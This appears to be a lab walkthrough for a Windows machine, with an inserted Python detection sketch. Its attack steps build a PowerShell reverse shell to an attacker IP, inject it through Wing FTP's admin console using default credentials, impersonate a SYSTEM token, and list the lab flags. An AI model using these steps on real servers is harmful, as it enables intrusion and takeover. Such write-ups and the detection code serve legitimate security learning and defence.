Info

  • Name – Imposter
  • IP Address – 172.31.1.20

Enumeration

Open Ports

Ports  Protocol  Service       Version
123    udp       filtered      ntp
135    tcp       msrpc         Microsoft Windows RPC
137    udp       netbios-ns    Microsoft Windows netbios-ns
138    udp       filtered      netbios-dgm
139    tcp       netbios-ssn   Microsoft Windows netbios-ssn
162    udp       filtered      snmptrap
445    tcp       microsoft-ds  Microsoft Windows Server 2008 R2 – 2012 microsoft-ds
445    udp       filtered      microsoft-ds
500    udp       filtered      isakmp
514    udp       filtered      syslog
520    udp       filtered      route
631    udp       filtered      ipp
1025   tcp       msrpc         Microsoft Windows RPC
1026   tcp       msrpc         Microsoft Windows RPC
1027   tcp       msrpc         Microsoft Windows RPC
1028   tcp       msrpc         Microsoft Windows RPC
1029   tcp       msrpc         Microsoft Windows RPC
1036   tcp       msrpc         Microsoft Windows RPC
1037   tcp       msrpc         Microsoft Windows RPC
1434   udp       filtered      ms-sql-m
4500   udp       filtered      nat-t-ike
5985   tcp       http          Microsoft HTTPAPI httpd 2.0
8080   tcp       http-proxy    Wing FTP Server(UNREGISTERED)
47001  tcp       http          Microsoft HTTPAPI httpd 2.0
49152  udp       filtered      unknown

Exploitation

Exploit Details (SearchSploit)

Generate a base64-encoded PowerShell reverse shell payload.

python mkpsrevshell.py 10.10.0.15 443

Log in to the Wing FTP admin portal (admin / password) and navigate to Administration > Console. Type in the command below and intercept the request with Burp Suite.

os.execute('whoami')

Replace the command in the intercepted request with the base64-encoded reverse shell payload and send it.

Catch the reverse shell and read the access.txt file.

whoami
type C:\Users\lian\Desktop\access.txt
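
Detection note (an added example, not part of the original walkthrough): commands run from the admin console with os.execute start as child processes of the FTP service, so process-creation logs show the service spawning a shell, often with an encoded PowerShell argument. The sketch below triages such events; the Sysmon Event ID 1 field names, the WFTPServer.exe image name and install path, and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Assumptions: Sysmon Event ID 1 field names; Wing FTP service image name.
SERVER_IMAGES = {"wftpserver.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
FLAG = re.compile(r"(?i)\s[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{8,})")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the script passed via -EncodedCommand (or a prefix of it), else None."""
    for flag, blob in FLAG.findall(cmdline):
        flag = flag.lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:  # PowerShell expects base64 over UTF-16LE text
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:
                return None
    return None

def triage(events):
    """Return (reason, decoded_script) for each suspicious process creation."""
    alerts = []
    for ev in events:
        if basename(ev["ParentImage"]) not in SERVER_IMAGES:
            continue
        # Lua's os.execute goes through cmd.exe /c, so the payload sits in its command line.
        script = decode_encoded_command(ev["CommandLine"])
        if script is not None:
            alerts.append(("encoded PowerShell under FTP service", script))
        elif basename(ev["Image"]) in SHELLS:
            alerts.append(("shell spawned by FTP service", None))
    return alerts

# Constructed sample events; the encoded script is just "whoami".
SAMPLE_B64 = base64.b64encode("whoami".encode("utf-16-le")).decode()
WFTP = r"C:\Program Files (x86)\Wing FTP Server\WFTPServer.exe"  # assumed path
SAMPLE_EVENTS = [
    {"ParentImage": WFTP, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -e " + SAMPLE_B64},
    {"ParentImage": WFTP, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy RemoteSigned -File backup.ps1"},
]

if __name__ == "__main__":
    for reason, script in triage(SAMPLE_EVENTS):
        print(reason, "->", script)
```

Decoding the argument at triage time puts the actual script in the alert, which is what an analyst needs to scope the session.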

Privilege Escalation

Exploit Details (SeImpersonate Privilege)

  • Name – SeImpersonate Privilege
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A

run
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
type C:\Users\Administrator\Desktop\system.txt

Loot

access.txt - cad14501e31203841c87fe62f4033605
system.txt - 0fae2c56cb5999b9ca977984e7e4646c